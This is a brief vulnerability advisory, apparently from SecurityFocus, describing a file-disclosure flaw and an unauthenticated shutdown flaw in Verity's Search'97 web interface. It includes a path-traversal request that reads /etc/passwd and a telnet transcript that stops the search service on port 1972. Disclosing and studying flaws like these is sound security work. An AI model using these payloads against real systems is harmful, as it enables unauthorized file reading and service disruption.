source: http://www.securityfocus.com/bid/162/info

A pair of vulnerabilities exist in Verity's Search`97 web interface to the Verity search engine. The first vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence of certain shell meta characters. This allows an attacker to access any file on the file system.

The second vulnerability is due to a lack of authentication being used to access the Verity administrative program. Any user can telnet to the appropriate port, and issue a command to shut the Verity software down.

s97_cgi:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books

tasmgr:
telnet to port 1972

0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg